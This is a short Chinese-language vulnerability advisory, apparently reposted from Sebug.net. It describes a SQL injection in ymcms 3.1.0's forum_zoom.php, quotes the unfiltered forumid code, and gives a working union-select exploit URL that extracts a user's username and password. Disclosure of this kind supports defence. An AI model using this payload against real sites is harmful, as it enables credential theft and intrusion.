影響版本: ymcms3.1.0

詳細(xì)說明: forum_zoom.php 31~48行 if ($forumid != ""){ $isforum = " && forumid IN (".$forumid.") "; }else{ $isforum = ""; } //forumid明顯沒有過濾 …… $sql = "Select threadid, title, lastpost FROM ".$ym_thread_tab." Where isshow="1" ".$isforum." orDER BY ".$isaction." LIMIT 0, ".$shownum; 發(fā)生了注射

參考: misssky's BLOG

解決方案: http://www.ymcms.com/

測試方法: [警 告] 以下程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用.風(fēng)險(xiǎn)自負(fù)! exp:[union] forum_zoom.php?forumid=15)%20and%201=2%20union%20select%201,concat(username,0x3f,password),3%20from%20user%20where%20userid=1/*

//Sebug.net 本安全信息由Sebug.net翻譯整理，版權(quán)所有，未經(jīng)許可，不得轉(zhuǎn)載

轉(zhuǎn)載于:https://www.cnblogs.com/allyesno/archive/2007/08/05/843451.html

總結(jié)

以上是生活随笔為你收集整理的ymcms SQL注入漏洞的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。